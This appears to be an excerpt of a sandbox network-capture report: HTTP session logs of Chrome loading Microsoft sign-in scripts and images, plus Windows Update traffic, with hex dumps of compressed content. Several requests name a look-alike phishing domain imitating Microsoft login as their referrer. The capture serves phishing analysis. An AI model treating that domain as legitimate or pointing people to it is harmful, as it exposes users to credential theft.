                                                                                                                              x-fd-int-roxy-purgeid: 4554691
                                                                                                                              X-Cache: TCP_HIT
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              2024-10-04 13:11:15 UTC2672INData Raw: 47 49 46 38 39 61 60 01 03 00 f0 00 00 ff ff ff 96 96 96 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 21 f9 04 09 05 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 36 84 1d a9 b7 07 ed 50 8a 6c d2 8b b3 de bc fb 0f 86 e2 48 96 e6 89 a2 0a 04 49 01 d6 3a 71 4a d7 f6 8d e7 fa ce 6b ab f5 00 ba 60 42 59 b1 87 4c 2a 97 cc 26 af 00 00 21 f9 04 09 05 00 00 00 2c 06 00 00 00 30 00 03 00 00 02 1a 8c 01 16 88 ca ec 1e 3c f2 a9 18 1b b5 5b e6 9a 5c 4b 38 6a e5 74 72 a9 67 14 00 21 f9 04 09 03 00 00 00 2c 07 00 00 00 33 00 03 00 00 02 1a 8c 81 16 c8 ca ef 5e 3b 12 2a 0a e2 5c 55 4b df 5d 5c 86 25 e5 56 99 63 aa 14 00 21 f9 04 09 05 00 00 00 2c 0a 00 00 00 37 00 03 00 00 02 1a 8c 81 60 91 b9 ed 0e 6c 6f c6 c5 ee ac 90 5b bf 61 19 02 2a 52 77 7e 69 18 14 00 21
                                                                                                                              Data Ascii: GIF89a`!NETSCAPE2.0!,`6PlHI:qJk`BYL*&!,0<[\K8jtrg!,3^;*\UK]\%Vc!,7`lo[a*Rw~i!


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              59192.168.2.174983213.107.246.454432980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:11:15 UTC435OUTGET /shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_d0a803279e7397bef834.js HTTP/1.1
                                                                                                                              Host: aadcdn.msauth.net
                                                                                                                              Connection: keep-alive
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: none
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-10-04 13:11:15 UTC811INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 04 Oct 2024 13:11:15 GMT
                                                                                                                              Content-Type: application/x-javascript
                                                                                                                              Content-Length: 5529
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                              Content-Encoding: gzip
                                                                                                                              Last-Modified: Thu, 15 Aug 2024 17:52:54 GMT
                                                                                                                              ETag: 0x8DCBD531731891C
                                                                                                                              x-ms-request-id: ab5b93cd-601e-0065-3303-161aad000000
                                                                                                                              x-ms-version: 2009-09-19
                                                                                                                              x-ms-lease-status: unlocked
                                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              x-azure-ref: 20241004T131115Z-15767c5fc554wklc0x4mc5pq0w0000000cwg00000000d35s
                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                              X-Cache: TCP_HIT
                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              2024-10-04 13:11:15 UTC5529INData Raw: 1f 8b 08 00 00 00 00 00 04 00 ad 5b 7d 77 9b 46 d6 ff 7f 3f 05 62 f7 28 b0 19 63 bb 69 9b 16 97 fa 38 7a 49 d4 da b1 6b c9 ed 66 93 1c 1d 24 46 12 31 02 ca 20 db aa a5 ef fe fc ee 0c 08 24 21 d9 e9 b3 3d a9 31 33 77 ee dc b9 73 df 2f 3e fc 77 ed 1f da bf b5 83 e7 ff a7 75 7b 67 d7 3d ed b2 ad f5 de 75 ae 9b da 15 de 3e 68 ef 2f 7b 9d 46 eb f9 78 68 53 fa bf 37 f1 85 36 f2 03 ae e1 39 70 05 f7 b4 28 d4 a2 44 f3 c3 61 94 c4 51 e2 a6 5c 68 53 fc 4c 7c 37 d0 46 49 34 d5 d2 09 d7 e2 24 fa c2 87 a9 d0 02 5f a4 58 34 e0 41 74 af 19 40 97 78 da 95 9b a4 73 ad 73 65 5a c0 cf 81 cd 1f fb 21 56 0f a3 78 8e df 27 a9 16 46 a9 3f e4 9a 1b 7a 12 5b 80 97 50 70 6d 16 7a 3c d1 ee 27 fe 70 a2 5d f8 c3 24 12 d1 28 d5 12 3e e4 fe 1d 36 11 33 8c af 6f c1 34 37 e1 9a e0 a9 36
                                                                                                                              Data Ascii: [}wF?b(ci8zIkf$F1 $!=13ws/>wu{g=u>h/{FxhS769p(DaQ\hSL|7FI4$_X4At@xsseZ!Vx'F?z[Ppmz<'p]$(>63o476


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              60192.168.2.174983413.107.246.454432980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:11:15 UTC666OUTGET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1
                                                                                                                              Host: aadcdn.msauth.net
                                                                                                                              Connection: keep-alive
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                              Referer: https://l0gin-microso.ftlivedocs.tech/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-10-04 13:11:15 UTC784INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 04 Oct 2024 13:11:15 GMT
                                                                                                                              Content-Type: image/svg+xml
                                                                                                                              Content-Length: 673
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                              Content-Encoding: gzip
                                                                                                                              Last-Modified: Wed, 24 May 2023 10:11:46 GMT
                                                                                                                              ETag: 0x8DB5C3F47E260FD
                                                                                                                              x-ms-request-id: 9c7b4821-901e-0045-01cb-0f2918000000
                                                                                                                              x-ms-version: 2009-09-19
                                                                                                                              x-ms-lease-status: unlocked
                                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              x-azure-ref: 20241004T131115Z-15767c5fc55jdxmppy6cmd24bn00000004r000000000grsd
                                                                                                                              x-fd-int-roxy-purgeid: 4554691
                                                                                                                              X-Cache: TCP_HIT
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              2024-10-04 13:11:15 UTC673INData Raw: 1f 8b 08 00 00 00 00 00 04 00 b5 55 db 6e db 30 0c fd 15 c1 7d 69 1e ac 50 b2 ae 43 1c a0 37 6c 2f c3 0a 64 fd 80 d4 b1 13 03 ae 1d d8 6e d3 f6 eb 47 ca f6 96 0c 79 6c 10 20 e6 91 45 f2 f0 98 94 16 dd db 96 bd bf 54 75 97 46 bb be df 7f 9b cf 0f 87 03 3f 24 bc 69 b7 73 09 00 73 dc 11 b1 43 b9 e9 77 69 24 bc 84 88 ed f2 72 bb eb 11 81 43 54 94 55 95 46 75 53 e7 d1 72 b1 65 cd 7e 9d 95 fd 47 1a 71 19 b1 ac 2a f7 f1 7e 4d ae af 6d 75 7d f5 30 c3 3d 84 d9 26 8d 7e 0a 65 0c 57 4c 58 af b9 cc bc 06 9e 58 06 88 25 70 17 1b 69 b9 96 13 12 0a 04 37 2b a9 84 e1 d6 c6 02 c0 b1 c1 3f d8 b1 d4 0a cd c4 01 57 4e 0e 88 25 3e e1 a6 b3 16 d7 24 ed a6 08 63 bc 11 7d 4e f4 03 bb 9b 59 34 3f a2 97 78 c5 31 bf 13 9a 9b cc 2a c3 b5 23 76 89 16 c8 47 61 6c 39 01 21 02 39 81 41
                                                                                                                              Data Ascii: Un0}iPC7l/dnGyl ETuF?$issCwi$rCTUFuSre~Gq*~Mmu}0=&~eWLXX%pi7+?WN%>$c}NY4?x1*#vGal9!9A


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              61192.168.2.174983513.107.246.454432980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:11:15 UTC667OUTGET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1
                                                                                                                              Host: aadcdn.msauth.net
                                                                                                                              Connection: keep-alive
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                              Referer: https://l0gin-microso.ftlivedocs.tech/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-10-04 13:11:15 UTC785INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 04 Oct 2024 13:11:15 GMT
                                                                                                                              Content-Type: image/svg+xml
                                                                                                                              Content-Length: 1435
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                              Content-Encoding: gzip
                                                                                                                              Last-Modified: Wed, 24 May 2023 10:11:48 GMT
                                                                                                                              ETag: 0x8DB5C3F4911527F
                                                                                                                              x-ms-request-id: adf1d5ec-d01e-002d-0381-10079a000000
                                                                                                                              x-ms-version: 2009-09-19
                                                                                                                              x-ms-lease-status: unlocked
                                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              x-azure-ref: 20241004T131115Z-15767c5fc55kg97hfq5uqyxxaw0000000chg00000000dd7v
                                                                                                                              x-fd-int-roxy-purgeid: 4554691
                                                                                                                              X-Cache: TCP_HIT
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              2024-10-04 13:11:15 UTC1435INData Raw: 1f 8b 08 00 00 00 00 00 04 00 bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12 24 b5 5d 68 a5
                                                                                                                              Data Ascii: WMo7+uVHJ{&v(QFaWQ|~|{~b{8zv8|bgxby{x<\lSppl7o}vtrr|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#$]h


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              62192.168.2.174983813.107.246.454432980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:11:16 UTC417OUTGET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1
                                                                                                                              Host: aadcdn.msauth.net
                                                                                                                              Connection: keep-alive
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: none
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-10-04 13:11:16 UTC805INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 04 Oct 2024 13:11:16 GMT
                                                                                                                              Content-Type: image/svg+xml
                                                                                                                              Content-Length: 673
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                              Content-Encoding: gzip
                                                                                                                              Last-Modified: Wed, 24 May 2023 10:11:46 GMT
                                                                                                                              ETag: 0x8DB5C3F47E260FD
                                                                                                                              x-ms-request-id: 9c7b4821-901e-0045-01cb-0f2918000000
                                                                                                                              x-ms-version: 2009-09-19
                                                                                                                              x-ms-lease-status: unlocked
                                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              x-azure-ref: 20241004T131116Z-15767c5fc55472x4k7dmphmadg0000000c4000000000k028
                                                                                                                              x-fd-int-roxy-purgeid: 4554691
                                                                                                                              X-Cache: TCP_HIT
                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              2024-10-04 13:11:16 UTC673INData Raw: 1f 8b 08 00 00 00 00 00 04 00 b5 55 db 6e db 30 0c fd 15 c1 7d 69 1e ac 50 b2 ae 43 1c a0 37 6c 2f c3 0a 64 fd 80 d4 b1 13 03 ae 1d d8 6e d3 f6 eb 47 ca f6 96 0c 79 6c 10 20 e6 91 45 f2 f0 98 94 16 dd db 96 bd bf 54 75 97 46 bb be df 7f 9b cf 0f 87 03 3f 24 bc 69 b7 73 09 00 73 dc 11 b1 43 b9 e9 77 69 24 bc 84 88 ed f2 72 bb eb 11 81 43 54 94 55 95 46 75 53 e7 d1 72 b1 65 cd 7e 9d 95 fd 47 1a 71 19 b1 ac 2a f7 f1 7e 4d ae af 6d 75 7d f5 30 c3 3d 84 d9 26 8d 7e 0a 65 0c 57 4c 58 af b9 cc bc 06 9e 58 06 88 25 70 17 1b 69 b9 96 13 12 0a 04 37 2b a9 84 e1 d6 c6 02 c0 b1 c1 3f d8 b1 d4 0a cd c4 01 57 4e 0e 88 25 3e e1 a6 b3 16 d7 24 ed a6 08 63 bc 11 7d 4e f4 03 bb 9b 59 34 3f a2 97 78 c5 31 bf 13 9a 9b cc 2a c3 b5 23 76 89 16 c8 47 61 6c 39 01 21 02 39 81 41
                                                                                                                              Data Ascii: Un0}iPC7l/dnGyl ETuF?$issCwi$rCTUFuSre~Gq*~Mmu}0=&~eWLXX%pi7+?WN%>$c}NY4?x1*#vGal9!9A


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              63192.168.2.174983913.107.246.454432980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:11:16 UTC418OUTGET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1
                                                                                                                              Host: aadcdn.msauth.net
                                                                                                                              Connection: keep-alive
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: none
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-10-04 13:11:16 UTC806INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 04 Oct 2024 13:11:16 GMT
                                                                                                                              Content-Type: image/svg+xml
                                                                                                                              Content-Length: 1435
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                              Content-Encoding: gzip
                                                                                                                              Last-Modified: Wed, 24 May 2023 10:11:48 GMT
                                                                                                                              ETag: 0x8DB5C3F4911527F
                                                                                                                              x-ms-request-id: adf1d5ec-d01e-002d-0381-10079a000000
                                                                                                                              x-ms-version: 2009-09-19
                                                                                                                              x-ms-lease-status: unlocked
                                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              x-azure-ref: 20241004T131116Z-15767c5fc55ncqdn59ub6rndq00000000cbg0000000005yr
                                                                                                                              x-fd-int-roxy-purgeid: 4554691
                                                                                                                              X-Cache: TCP_HIT
                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              2024-10-04 13:11:16 UTC1435INData Raw: 1f 8b 08 00 00 00 00 00 04 00 bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12 24 b5 5d 68 a5
                                                                                                                              Data Ascii: WMo7+uVHJ{&v(QFaWQ|~|{~b{8zv8|bgxby{x<\lSppl7o}vtrr|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#$]h


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              64192.168.2.17498374.175.87.197443
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:11:16 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=6Xtt1sBzydtZp6M&MD=91XKTh55 HTTP/1.1
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Accept: */*
                                                                                                                              User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                              Host: slscr.update.microsoft.com
                                                                                                                              2024-10-04 13:11:16 UTC560INHTTP/1.1 200 OK
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Expires: -1
                                                                                                                              Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                              ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                              MS-CorrelationId: a618d8e9-168d-4393-b897-055ba4b81d28
                                                                                                                              MS-RequestId: 9da74cd5-4518-49ad-a912-c3c622fe5f88
                                                                                                                              MS-CV: IOVEkaa/CU25sI4w.0
                                                                                                                              X-Microsoft-SLSClientCache: 1440
                                                                                                                              Content-Disposition: attachment; filename=environment.cab
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Date: Fri, 04 Oct 2024 13:11:15 GMT
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 30005
                                                                                                                              2024-10-04 13:11:16 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                                              Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                                              2024-10-04 13:11:16 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                                                              Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              65192.168.2.174984013.107.246.454432980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:11:16 UTC628OUTGET /shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_4285088f1dbaf52a876d.js HTTP/1.1
                                                                                                                              Host: aadcdn.msauth.net
                                                                                                                              Connection: keep-alive
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                              Referer: https://l0gin-microso.ftlivedocs.tech/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-10-04 13:11:16 UTC812INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 04 Oct 2024 13:11:16 GMT
                                                                                                                              Content-Type: application/x-javascript
                                                                                                                              Content-Length: 35168
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                              Content-Encoding: gzip
                                                                                                                              Last-Modified: Thu, 15 Aug 2024 17:52:55 GMT
                                                                                                                              ETag: 0x8DCBD5317AEB807
                                                                                                                              x-ms-request-id: b9620ef8-901e-0037-449c-112e57000000
                                                                                                                              x-ms-version: 2009-09-19
                                                                                                                              x-ms-lease-status: unlocked
                                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              x-azure-ref: 20241004T131116Z-15767c5fc55w69c2zvnrz0gmgw0000000crg00000000gp7p
                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                              X-Cache: TCP_HIT
                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              2024-10-04 13:11:16 UTC15572INData Raw: 1f 8b 08 00 00 00 00 00 04 00 c4 bd 6b 43 db 48 b2 30 fc fd f9 15 e0 9d 65 ac b5 00 df 30 18 70 58 06 92 49 76 33 93 9c 5c 66 cf 2e 30 59 59 96 6d 0d b2 65 24 99 4b 02 cf 6f 7f eb d2 97 6a c9 90 cc 9c 67 df 33 e7 6c 70 57 df aa ab ab ab ab aa ab 5b db 7f 59 ff 3f 6b 7f 59 db fc f6 ff d6 de 7f 38 7e f7 61 ed cd 8b b5 0f 2f 5f bd 3b 5d 7b 0b a9 7f ae fd fc e6 c3 ab 93 e7 df de 0e 76 8a ff fb 30 8d f3 b5 71 9c 44 6b f0 77 18 e4 d1 68 2d 9d af a5 d9 5a 3c 0f d3 6c 91 66 41 11 e5 6b 33 f8 37 8b 83 64 6d 9c a5 b3 b5 62 1a ad 2d b2 f4 b7 28 2c f2 b5 24 ce 0b a8 34 8c 92 f4 66 ad 0e cd 65 a3 b5 b7 41 56 dc ad bd 7a eb 6d 41 fb 11 b4 16 4f e2 39 d4 0e d3 c5 1d fc 9e 16 6b f3 b4 88 c3 68 2d 98 8f a8 b5 04 12 f3 3c 5a 5b ce 47 51 b6 76 33 8d c3 e9 da 4f 71 98 a5 79
                                                                                                                              Data Ascii: kCH0e0pXIv3\f.0YYme$Kojg3lpW[Y?kY8~a/_;]{v0qDkwh-Z<lfAk37dmb-(,$4feAVzmAO9kh-<Z[GQv3Oqy
